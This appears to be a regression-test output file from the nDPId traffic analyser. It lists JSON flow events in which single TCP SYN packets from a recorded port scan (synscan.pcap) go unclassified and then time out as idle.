-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1309,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1310,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1065,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1012,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
